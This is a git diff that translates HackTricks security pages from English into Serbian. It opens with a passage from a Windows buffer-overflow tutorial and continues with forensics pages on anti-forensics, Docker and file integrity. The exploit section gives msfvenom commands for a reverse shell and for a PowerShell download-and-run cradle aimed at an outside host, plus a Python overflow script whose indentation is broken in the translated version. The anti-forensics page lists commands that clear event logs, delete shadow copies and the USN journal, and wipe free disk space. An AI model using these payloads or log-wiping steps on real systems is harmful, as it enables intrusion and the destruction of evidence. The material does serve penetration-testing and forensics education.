+Izvršavajte eksploataciju ponovo sa ovim novim baferom brišući karaktere za koje se utvrdi da su beskorisni:
 
-Execute repeatedly the exploit with this new buffer delenting the chars that are found to be useless:.
+Na primer:
 
-For example:
-
-In this case you can see that **you shouldn't use the char 0x0A** (nothing is saved in memory since the char 0x09).
+U ovom slučaju možete videti da **ne biste trebali koristiti karakter 0x0A** (ništa se ne čuva u memoriji pošto je karakter 0x09).
 
 ![](<../images/image (33) (1).png>)
 
-In this case you can see that **the char 0x0D is avoided**:
+U ovom slučaju možete videti da **se karakter 0x0D izbegava**:
 
 ![](<../images/image (34) (1).png>)
 
-## Find a JMP ESP as a return address
-
-Using:
+## Pronađite JMP ESP kao adresu povratka
 
+Koristeći:
 ```
 !mona modules    #Get protections, look for all false except last one (Dll of SO)
 ```
-
-You will **list the memory maps**. Search for some DLl that has:
+Ćete **navesti mape memorije**. Potražite neki DLL koji ima:
 
 - **Rebase: False**
 - **SafeSEH: False**
@@ -174,30 +158,25 @@ You will **list the memory maps**. Search for some DLl that has:
 
 ![](<../images/image (35) (1).png>)
 
-Now, inside this memory you should find some JMP ESP bytes, to do that execute:
-
+Sada, unutar ove memorije trebali biste pronaći neke JMP ESP bajtove, da biste to uradili izvršite:
 ```
 !mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP)
 !mona find -s "\xff\xe4" -m slmfc.dll # Example in this case
 ```
-
-**Then, if some address is found, choose one that don't contain any badchar:**
+**Zatim, ako se pronađe neka adresa, izaberite onu koja ne sadrži nikakve badchar:**
 
 ![](<../images/image (36) (1).png>)
 
-**In this case, for example: \_0x5f4a358f**\_
-
-## Create shellcode
+**U ovom slučaju, na primer: \_0x5f4a358f**\_
 
+## Kreirajte shellcode
 ```
 msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
 msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d'
 ```
+Ako eksploatacija ne funkcioniše, ali bi trebala (možete videti sa ImDebg da je shellcode dostignut), pokušajte da kreirate druge shellcode-ove (msfvenom sa kreiranjem različitih shellcode-ova za iste parametre).
 
-If the exploit is not working but it should (you can see with ImDebg that the shellcode is reached), try to create other shellcodes (msfvenom with create different shellcodes for the same parameters).
-
-**Add some NOPS at the beginning** of the shellcode and use it and the return address to JMP ESP, and finish the exploit:
-
+**Dodajte neke NOPS na početak** shellcode-a i koristite ga zajedno sa povratnom adresom za JMP ESP, i završite eksploataciju:
 ```bash
 #!/usr/bin/python
 
@@ -236,26 +215,23 @@ shellcode = (
 
 buffer = 'A' * 2606 + '\x8f\x35\x4a\x5f' + "\x90" * 8 + shellcode
 try:
-    print "\nLaunching exploit..."
-    s.connect((ip, port))
-    data = s.recv(1024)
-    s.send('USER username' +'\r\n')
-    data = s.recv(1024)
-    s.send('PASS ' + buffer + '\r\n')
-    print "\nFinished!."
+print "\nLaunching exploit..."
+s.connect((ip, port))
+data = s.recv(1024)
+s.send('USER username' +'\r\n')
+data = s.recv(1024)
+s.send('PASS ' + buffer + '\r\n')
+print "\nFinished!."
 except:
-    print "Could not connect to "+ip+":"+port
+print "Could not connect to "+ip+":"+port
 ```
-
 > [!WARNING]
-> There are shellcodes that will **overwrite themselves**, therefore it's important to always add some NOPs before the shellcode
+> Postoje shellcode-ovi koji će **prepisati sebe**, stoga je važno uvek dodati nekoliko NOP-ova pre shellcode-a
 
-## Improving the shellcode
-
-Add this parameters:
+## Poboljšanje shellcode-a
 
+Dodajte ove parametre:
 ```
 EXITFUNC=thread -e x86/shikata_ga_nai
 ```
-
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/README.md b/src/forensics/basic-forensic-methodology/README.md
index e725dfa85..fcf7aaefc 100644
--- a/src/forensics/basic-forensic-methodology/README.md
+++ b/src/forensics/basic-forensic-methodology/README.md
@@ -1,30 +1,30 @@
-# Basic Forensic Methodology
+# Osnovna Forenzička Metodologija
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Creating and Mounting an Image
+## Kreiranje i Montiranje Slike
 
 {{#ref}}
 ../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
 {{#endref}}
 
-## Malware Analysis
+## Analiza Malvera
 
-This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**:
+Ovo **nije nužno prvi korak koji treba preduzeti kada imate sliku**. Ali možete koristiti ove tehnike analize malvera nezavisno ako imate datoteku, sliku datotečnog sistema, sliku memorije, pcap... tako da je dobro **imati na umu ove akcije**:
 
 {{#ref}}
 malware-analysis.md
 {{#endref}}
 
-## Inspecting an Image
+## Istraživanje Slike
 
-if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in:
+Ako dobijete **forenzičku sliku** uređaja, možete početi **analizirati particije, datotečni sistem** koji se koristi i **opraviti** potencijalno **zanimljive datoteke** (čak i obrisane). Saznajte kako u:
 
 {{#ref}}
 partitions-file-systems-carving/
 {{#endref}}
 
-Depending on the used OSs and even platform different interesting artifacts should be searched:
+U zavisnosti od korišćenih OS-ova i čak platformi, različiti zanimljivi artefakti treba da se pretražuju:
 
 {{#ref}}
 windows-forensics/
@@ -38,42 +38,42 @@ linux-forensics.md
 docker-forensics.md
 {{#endref}}
 
-## Deep inspection of specific file-types and Software
+## Dubinska Inspekcija Specifičnih Tipova Datoteka i Softvera
 
-If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\
-Read the following page to learn some interesting tricks:
+Ako imate vrlo **sumnjivu** **datoteku**, onda **u zavisnosti od tipa datoteke i softvera** koji je kreirao, nekoliko **trikova** može biti korisno.\
+Pročitajte sledeću stranicu da biste saznali neke zanimljive trikove:
 
 {{#ref}}
 specific-software-file-type-tricks/
 {{#endref}}
 
-I want to do a special mention to the page:
+Želim da posebno pomenem stranicu:
 
 {{#ref}}
 specific-software-file-type-tricks/browser-artifacts.md
 {{#endref}}
 
-## Memory Dump Inspection
+## Inspekcija Dump-a Memorije
 
 {{#ref}}
 memory-dump-analysis/
 {{#endref}}
 
-## Pcap Inspection
+## Inspekcija Pcap-a
 
 {{#ref}}
 pcap-inspection/
 {{#endref}}
 
-## **Anti-Forensic Techniques**
+## **Anti-forenzičke Tehnike**
 
-Keep in mind the possible use of anti-forensic techniques:
+Imajte na umu moguću upotrebu anti-forenzičkih tehnika:
 
 {{#ref}}
 anti-forensic-techniques.md
 {{#endref}}
 
-## Threat Hunting
+## Lov na Pretnje
 
 {{#ref}}
 file-integrity-monitoring.md
diff --git a/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md
index 615ede378..9aa944ac3 100644
--- a/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md
+++ b/src/forensics/basic-forensic-methodology/anti-forensic-techniques.md
@@ -1,159 +1,151 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-

+# Vremenske oznake
 
-{% embed url="https://websec.nl/" %}
+Napadač može biti zainteresovan za **promenu vremenskih oznaka datoteka** kako bi izbegao otkrivanje.\
+Moguće je pronaći vremenske oznake unutar MFT u atributima `$STANDARD_INFORMATION` ** i ** `$FILE_NAME`.
 
-# Timestamps
+Oba atributa imaju 4 vremenske oznake: **Izmena**, **pristup**, **kreiranje** i **izmena MFT registra** (MACE ili MACB).
 
-An attacker may be interested in **changing the timestamps of files** to avoid being detected.\
-It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` ** and ** `$FILE_NAME`.
+**Windows explorer** i drugi alati prikazuju informacije iz **`$STANDARD_INFORMATION`**.
 
-Both attributes have 4 timestamps: **Modification**, **access**, **creation**, and **MFT registry modification** (MACE or MACB).
+## TimeStomp - Anti-forenzički alat
 
-**Windows explorer** and other tools show the information from **`$STANDARD_INFORMATION`**.
-
-## TimeStomp - Anti-forensic Tool
-
-This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION`** **but** **not** the information inside **`$FILE_NAME`**. Therefore, it's possible to **identify** **suspicious** **activity**.
+Ovaj alat **menja** informacije o vremenskim oznakama unutar **`$STANDARD_INFORMATION`** **ali** **ne** informacije unutar **`$FILE_NAME`**. Stoga, moguće je **identifikovati** **sumnjivu** **aktivnost**.
 
 ## Usnjrnl
 
-The **USN Journal** (Update Sequence Number Journal) is a feature of the NTFS (Windows NT file system) that keeps track of volume changes. The [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) tool allows for the examination of these changes.
+**USN Journal** (Dnevnik broja ažuriranja) je funkcija NTFS (Windows NT datotečni sistem) koja prati promene na volumenu. Alat [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) omogućava ispitivanje ovih promena.
 
 ![](<../../images/image (449).png>)
 
-The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file.
+Prethodna slika je **izlaz** prikazan od strane **alata** gde se može primetiti da su neke **promene izvršene** na datoteci.
 
 ## $LogFile
 
-**All metadata changes to a file system are logged** in a process known as [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). The logged metadata is kept in a file named `**$LogFile**`, located in the root directory of an NTFS file system. Tools such as [LogFileParser](https://github.com/jschicht/LogFileParser) can be used to parse this file and identify changes.
+**Sve promene metapodataka na datotečnom sistemu se beleže** u procesu poznatom kao [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead_logging). Beleženi metapodaci se čuvaju u datoteci nazvanoj `**$LogFile**`, koja se nalazi u korenskom direktorijumu NTFS datotečnog sistema. Alati kao što su [LogFileParser](https://github.com/jschicht/LogFileParser) mogu se koristiti za analizu ove datoteke i identifikaciju promena.
 
 ![](<../../images/image (450).png>)
 
-Again, in the output of the tool it's possible to see that **some changes were performed**.
+Ponovo, u izlazu alata moguće je videti da su **neke promene izvršene**.
 
-Using the same tool it's possible to identify to **which time the timestamps were modified**:
+Korišćenjem istog alata moguće je identifikovati **na koji način su vremenske oznake promenjene**:
 
 ![](<../../images/image (451).png>)
 
-- CTIME: File's creation time
-- ATIME: File's modification time
-- MTIME: File's MFT registry modification
-- RTIME: File's access time
+- CTIME: Vreme kreiranja datoteke
+- ATIME: Vreme izmene datoteke
+- MTIME: Izmena MFT registra datoteke
+- RTIME: Vreme pristupa datoteci
 
-## `$STANDARD_INFORMATION` and `$FILE_NAME` comparison
+## Poređenje `$STANDARD_INFORMATION` i `$FILE_NAME`
 
-Another way to identify suspicious modified files would be to compare the time on both attributes looking for **mismatches**.
+Još jedan način da se identifikuju sumnjivo izmenjene datoteke bio bi da se uporede vremena na oba atributa tražeći **neusklađenosti**.
 
-## Nanoseconds
+## Nanosekunde
 
-**NTFS** timestamps have a **precision** of **100 nanoseconds**. Then, finding files with timestamps like 2010-10-10 10:10:**00.000:0000 is very suspicious**.
+**NTFS** vremenske oznake imaju **preciznost** od **100 nanosekundi**. Stoga, pronalaženje datoteka sa vremenskim oznakama poput 2010-10-10 10:10:**00.000:0000 je veoma sumnjivo**.
 
-## SetMace - Anti-forensic Tool
+## SetMace - Anti-forenzički alat
 
-This tool can modify both attributes `$STARNDAR_INFORMATION` and `$FILE_NAME`. However, from Windows Vista, it's necessary for a live OS to modify this information.
+Ovaj alat može izmeniti oba atributa `$STARNDAR_INFORMATION` i `$FILE_NAME`. Međutim, od Windows Vista, potrebno je da živi OS izmeni ove informacije.
 
-# Data Hiding
+# Sakrivanje podataka
 
-NFTS uses a cluster and the minimum information size. That means that if a file occupies uses and cluster and a half, the **reminding half is never going to be used** until the file is deleted. Then, it's possible to **hide data in this slack space**.
+NFTS koristi klaster i minimalnu veličinu informacija. To znači da ako datoteka koristi i klaster i po i po, **preostala polovina nikada neće biti korišćena** dok se datoteka ne obriše. Stoga, moguće je **sakriti podatke u ovom slobodnom prostoru**.
 
-There are tools like slacker that allow hiding data in this "hidden" space. However, an analysis of the `$logfile` and `$usnjrnl` can show that some data was added:
+Postoje alati poput slacker koji omogućavaju sakrivanje podataka u ovom "skrivenom" prostoru. Međutim, analiza `$logfile` i `$usnjrnl` može pokazati da su neki podaci dodati:
 
 ![](<../../images/image (452).png>)
 
-Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this kind of tool can save the content obfuscated or even encrypted.
+Stoga, moguće je povratiti slobodan prostor koristeći alate poput FTK Imager. Imajte na umu da ovaj tip alata može sačuvati sadržaj obfuskovan ili čak enkriptovan.
 
 # UsbKill
 
-This is a tool that will **turn off the computer if any change in the USB** ports is detected.\
-A way to discover this would be to inspect the running processes and **review each python script running**.
+Ovo je alat koji će **isključiti računar ako se otkrije bilo kakva promena na USB** portovima.\
+Jedan od načina da se to otkrije bio bi da se ispita pokrenuti procesi i **pregleda svaki python skript koji se izvršava**.
 
-# Live Linux Distributions
+# Live Linux distribucije
 
-These distros are **executed inside the RAM** memory. The only way to detect them is **in case the NTFS file-system is mounted with write permissions**. If it's mounted just with read permissions it won't be possible to detect the intrusion.
+Ove distribucije se **izvršavaju unutar RAM** memorije. Jedini način da ih otkrijete je **ukoliko je NTFS datotečni sistem montiran sa dozvolama za pisanje**. Ako je montiran samo sa dozvolama za čitanje, neće biti moguće otkriti upad.
 
-# Secure Deletion
+# Sigurno brisanje
 
 [https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization)
 
-# Windows Configuration
+# Windows konfiguracija
 
-It's possible to disable several windows logging methods to make the forensics investigation much harder.
+Moguće je onemogućiti nekoliko metoda beleženja u Windows-u kako bi se forenzička istraga učinila mnogo težom.
 
-## Disable Timestamps - UserAssist
+## Onemogući vremenske oznake - UserAssist
 
-This is a registry key that maintains dates and hours when each executable was run by the user.
+Ovo je ključ registra koji održava datume i sate kada je svaki izvršni program pokrenut od strane korisnika.
 
-Disabling UserAssist requires two steps:
+Onemogućavanje UserAssist zahteva dva koraka:
 
-1. Set two registry keys, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` and `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, both to zero in order to signal that we want UserAssist disabled.
-2. Clear your registry subtrees that look like `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`.
+1. Postavite dva ključa registra, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` i `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, oba na nulu kako bismo signalizirali da želimo da onemogućimo UserAssist.
+2. Očistite svoje podključeve registra koji izgledaju kao `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`.
 
-## Disable Timestamps - Prefetch
+## Onemogući vremenske oznake - Prefetch
 
-This will save information about the applications executed with the goal of improving the performance of the Windows system. However, this can also be useful for forensics practices.
+Ovo će sačuvati informacije o aplikacijama koje su izvršene sa ciljem poboljšanja performansi Windows sistema. Međutim, ovo može biti korisno i za forenzičke prakse.
 
-- Execute `regedit`
-- Select the file path `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters`
-- Right-click on both `EnablePrefetcher` and `EnableSuperfetch`
-- Select Modify on each of these to change the value from 1 (or 3) to 0
-- Restart
+- Izvršite `regedit`
+- Izaberite putanju datoteke `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters`
+- Desni klik na `EnablePrefetcher` i `EnableSuperfetch`
+- Izaberite Izmeni na svakom od ovih da promenite vrednost sa 1 (ili 3) na 0
+- Ponovo pokrenite
 
-## Disable Timestamps - Last Access Time
+## Onemogući vremenske oznake - Vreme poslednjeg pristupa
 
-Whenever a folder is opened from an NTFS volume on a Windows NT server, the system takes the time to **update a timestamp field on each listed folder**, called the last access time. On a heavily used NTFS volume, this can affect performance.
+Kad god se folder otvori sa NTFS volumena na Windows NT serveru, sistem uzima vreme da **ažurira polje vremenske oznake na svakom navedenom folderu**, koje se naziva vreme poslednjeg pristupa. Na NTFS volumenu koji se često koristi, ovo može uticati na performanse.
 
-1. Open the Registry Editor (Regedit.exe).
-2. Browse to `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`.
-3. Look for `NtfsDisableLastAccessUpdate`. If it doesn’t exist, add this DWORD and set its value to 1, which will disable the process.
-4. Close the Registry Editor, and reboot the server.
+1. Otvorite Registry Editor (Regedit.exe).
+2. Pretražite do `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`.
+3. Potražite `NtfsDisableLastAccessUpdate`. Ako ne postoji, dodajte ovaj DWORD i postavite njegovu vrednost na 1, što će onemogućiti proces.
+4. Zatvorite Registry Editor i ponovo pokrenite server.
 
-## Delete USB History
+## Obriši USB istoriju
 
-All the **USB Device Entries** are stored in Windows Registry Under the **USBSTOR** registry key that contains sub keys which are created whenever you plug a USB Device into your PC or Laptop. You can find this key here H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Deleting this** you will delete the USB history.\
-You may also use the tool [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) to be sure you have deleted them (and to delete them).
+Sve **USB Device Entries** se čuvaju u Windows Registry pod ključem **USBSTOR** koji sadrži podključeve koji se kreiraju svaki put kada priključite USB uređaj na svoj PC ili laptop. Možete pronaći ovaj ključ ovde `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Brisanjem ovog** obrišete USB istoriju.\
+Takođe možete koristiti alat [**USBDeview**](https://www.nirsoft.net/utils/usb_devices_view.html) da biste bili sigurni da ste ih obrisali (i da ih obrišete).
 
-Another file that saves information about the USBs is the file `setupapi.dev.log` inside `C:\Windows\INF`. This should also be deleted.
+Još jedna datoteka koja čuva informacije o USB-ima je datoteka `setupapi.dev.log` unutar `C:\Windows\INF`. Ova datoteka takođe treba da bude obrisana.
 
-## Disable Shadow Copies
+## Onemogući senčne kopije
 
-**List** shadow copies with `vssadmin list shadowstorage`\
-**Delete** them running `vssadmin delete shadow`
+**Prikaz** senčnih kopija sa `vssadmin list shadowstorage`\
+**Obrišite** ih pokretanjem `vssadmin delete shadow`
 
-You can also delete them via GUI following the steps proposed in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html)
+Takođe ih možete obrisati putem GUI prateći korake predložene na [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html)
 
-To disable shadow copies [steps from here](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows):
+Da biste onemogućili senčne kopije [koraci odavde](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows):
 
-1. Open the Services program by typing "services" into the text search box after clicking the Windows start button.
-2. From the list, find "Volume Shadow Copy", select it, and then access Properties by right-clicking.
-3. Choose Disabled from the "Startup type" drop-down menu, and then confirm the change by clicking Apply and OK.
+1. Otvorite program Services tako što ćete otkucati "services" u tekstualnu pretragu nakon što kliknete na Windows dugme za pokretanje.
+2. Na listi pronađite "Volume Shadow Copy", izaberite ga, a zatim pristupite Svojstvima desnim klikom.
+3. Izaberite Onemogućeno iz padajućeg menija "Tip pokretanja", a zatim potvrdite promenu klikom na Primeni i U redu.
 
-It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
+Takođe je moguće izmeniti konfiguraciju koje datoteke će biti kopirane u senčnu kopiju u registru `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
 
-## Overwrite deleted files
+## Prepiši obrisane datoteke
 
-- You can use a **Windows tool**: `cipher /w:C` This will indicate cipher to remove any data from the available unused disk space inside the C drive.
-- You can also use tools like [**Eraser**](https://eraser.heidi.ie)
+- Možete koristiti **Windows alat**: `cipher /w:C` Ovo će označiti cipher da ukloni sve podatke iz dostupnog neiskorišćenog prostora na disku unutar C diska.
+- Takođe možete koristiti alate poput [**Eraser**](https://eraser.heidi.ie)
 
-## Delete Windows event logs
+## Obriši Windows događaje
 
-- Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log"
+- Windows + R --> eventvwr.msc --> Proširite "Windows Logs" --> Desni klik na svaku kategoriju i izaberite "Clear Log"
 - `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"`
 - `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }`
 
-## Disable Windows event logs
+## Onemogući Windows događaje
 
 - `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
-- Inside the services section disable the service "Windows Event Log"
-- `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl`
+- Unutar sekcije servisa onemogućite servis "Windows Event Log"
+- `WEvtUtil.exec clear-log` ili `WEvtUtil.exe cl`
 
-## Disable $UsnJrnl
+## Onemogući $UsnJrnl
 
 - `fsutil usn deletejournal /d c:`
 
-

-
-{% embed url="https://websec.nl/" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/docker-forensics.md b/src/forensics/basic-forensic-methodology/docker-forensics.md
index 629251985..c88362463 100644
--- a/src/forensics/basic-forensic-methodology/docker-forensics.md
+++ b/src/forensics/basic-forensic-methodology/docker-forensics.md
@@ -2,24 +2,16 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

 
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
-
-{% embed url="https://academy.8ksec.io/" %}
-
-## Container modification
-
-There are suspicions that some docker container was compromised:
+## Izmena kontejnera
 
+Postoje sumnje da je neki docker kontejner kompromitovan:
 ```bash
 docker ps
 CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
 cc03e43a052a        lamp-wordpress      "./run.sh"          2 minutes ago       Up 2 minutes        80/tcp              wordpress
 ```
-
-You can easily **find the modifications done to this container with regards to the image** with:
-
+Možete lako **pronaći izmene koje su izvršene na ovom kontejneru u vezi sa slikom** pomoću:
 ```bash
 docker diff wordpress
 C /var
@@ -33,70 +25,52 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI
 A /var/lib/mysql/mysql/general_log.CSV
 ...
 ```
-
-In the previous command **C** means **Changed** and **A,** **Added**.\
-If you find that some interesting file like `/etc/shadow` was modified you can download it from the container to check for malicious activity with:
-
+U prethodnoj komandi **C** znači **Promenjeno** a **A** znači **Dodato**.\
+Ako otkrijete da je neki zanimljiv fajl kao što je `/etc/shadow` izmenjen, možete ga preuzeti iz kontejnera da proverite za malicioznu aktivnost sa:
 ```bash
 docker cp wordpress:/etc/shadow.
 ```
-
-You can also **compare it with the original one** running a new container and extracting the file from it:
-
+Možete takođe **uporediti sa originalom** pokretanjem novog kontejnera i ekstrakcijom datoteke iz njega:
 ```bash
 docker run -d lamp-wordpress
 docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container
 diff original_shadow shadow
 ```
-
-If you find that **some suspicious file was added** you can access the container and check it:
-
+Ako otkrijete da je **neki sumnjiv fajl dodat**, možete pristupiti kontejneru i proveriti ga:
 ```bash
 docker exec -it wordpress bash
 ```
+## Izmene slika
 
-## Images modifications
-
-When you are given an exported docker image (probably in `.tar` format) you can use [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) to **extract a summary of the modifications**:
-
+Kada dobijete eksportovanu docker sliku (verovatno u `.tar` formatu), možete koristiti [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) da **izvučete sažetak izmena**:
 ```bash
 docker save  > image.tar #Export the image to a .tar file
 container-diff analyze -t sizelayer image.tar
 container-diff analyze -t history image.tar
 container-diff analyze -t metadata image.tar
 ```
-
-Then, you can **decompress** the image and **access the blobs** to search for suspicious files you may have found in the changes history:
-
+Zatim možete **dekompresovati** sliku i **pristupiti blobovima** da biste pretražili sumnjive datoteke koje ste možda pronašli u istoriji promena:
 ```bash
 tar -xf image.tar
 ```
+### Osnovna Analiza
 
-### Basic Analysis
-
-You can get **basic information** from the image running:
-
+Možete dobiti **osnovne informacije** iz slike pokretanjem:
 ```bash
 docker inspect 
 ```
-
-You can also get a summary **history of changes** with:
-
+Možete takođe dobiti sažetak **istorije promena** sa:
 ```bash
 docker history --no-trunc 
 ```
-
-You can also generate a **dockerfile from an image** with:
-
+Možete takođe generisati **dockerfile iz slike** sa:
 ```bash
 alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage"
 dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
 ```
-
 ### Dive
 
-In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility:
-
+Da biste pronašli dodate/izmenjene datoteke u docker slikama, možete koristiti [**dive**](https://github.com/wagoodman/dive) (preuzmite ga sa [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) alata:
 ```bash
 #First you need to load the image in your docker repo
 sudo docker load < image.tar                                                                                                                                                                                                         1 ⨯
@@ -105,27 +79,19 @@ Loaded image: flask:latest
 #And then open it with dive:
 sudo dive flask:latest
 ```
+Ovo vam omogućava da **navigirate kroz različite blobove docker slika** i proverite koji su fajlovi modifikovani/dodati. **Crvena** označava dodato, a **žuta** označava modifikovano. Koristite **tab** za prelazak na drugi prikaz i **space** za skupljanje/otvaranje foldera.
 
-This allows you to **navigate through the different blobs of docker images** and check which files were modified/added. **Red** means added and **yellow** means modified. Use **tab** to move to the other view and **space** to collapse/open folders.
-
-With die you won't be able to access the content of the different stages of the image. To do so you will need to **decompress each layer and access it**.\
-You can decompress all the layers from an image from the directory where the image was decompressed executing:
-
+Sa die nećete moći da pristupite sadržaju različitih faza slike. Da biste to uradili, moraćete da **dekompresujete svaki sloj i pristupite mu**.\
+Možete dekompresovati sve slojeve iz slike iz direktorijuma gde je slika dekompresovana izvršavanjem:
 ```bash
 tar -xf image.tar
 for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
 ```
+## Kredencijali iz memorije
 
-## Credentials from memory
+Napomena da kada pokrenete docker kontejner unutar hosta **možete videti procese koji se izvršavaju na kontejneru iz hosta** jednostavno pokretanjem `ps -ef`
 
-Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef`
+Stoga (kao root) možete **izvršiti dump memorije procesa** iz hosta i pretražiti za **kredencijalima** baš [**kao u sledećem primeru**](../../linux-hardening/privilege-escalation/#process-memory).
 
-Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/#process-memory).
-
-

-
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
-
-{% embed url="https://academy.8ksec.io/" %}
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md
index 214b917cf..7a32208c2 100644
--- a/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md
+++ b/src/forensics/basic-forensic-methodology/file-integrity-monitoring.md
@@ -1,25 +1,25 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-# Baseline
+# Osnovna linija
 
-A baseline consists of taking a snapshot of certain parts of a system to **compare it with a future status to highlight changes**.
+Osnovna linija se sastoji od pravljenja snimka određenih delova sistema kako bi se **uporedila sa budućim statusom radi isticanja promena**.
 
-For example, you can calculate and store the hash of each file of the filesystem to be able to find out which files were modified.\
-This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all.
+Na primer, možete izračunati i sačuvati hash svake datoteke u datotečnom sistemu kako biste mogli da saznate koje su datoteke modifikovane.\
+To se takođe može uraditi sa korisničkim nalozima koji su kreirani, procesima koji se izvršavaju, servisima koji se izvršavaju i bilo čim drugim što ne bi trebalo da se mnogo menja, ili uopšte.
 
-## File Integrity Monitoring
+## Praćenje integriteta datoteka
 
-File Integrity Monitoring (FIM) is a critical security technique that protects IT environments and data by tracking changes in files. It involves two key steps:
+Praćenje integriteta datoteka (FIM) je kritična bezbednosna tehnika koja štiti IT okruženja i podatke praćenjem promena u datotekama. Uključuje dva ključna koraka:
 
-1. **Baseline Comparison:** Establish a baseline using file attributes or cryptographic checksums (like MD5 or SHA-2) for future comparisons to detect modifications.
-2. **Real-Time Change Notification:** Get instant alerts when files are accessed or altered, typically through OS kernel extensions.
+1. **Uporedna analiza osnovne linije:** Uspostavite osnovnu liniju koristeći atribute datoteka ili kriptografske heš vrednosti (kao što su MD5 ili SHA-2) za buduće uporedbe radi otkrivanja modifikacija.
+2. **Obaveštavanje o promenama u realnom vremenu:** Dobijajte trenutna obaveštenja kada se datoteke pristupaju ili menjaju, obično putem ekstenzija jezgra OS-a.
 
-## Tools
+## Alati
 
 - [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring)
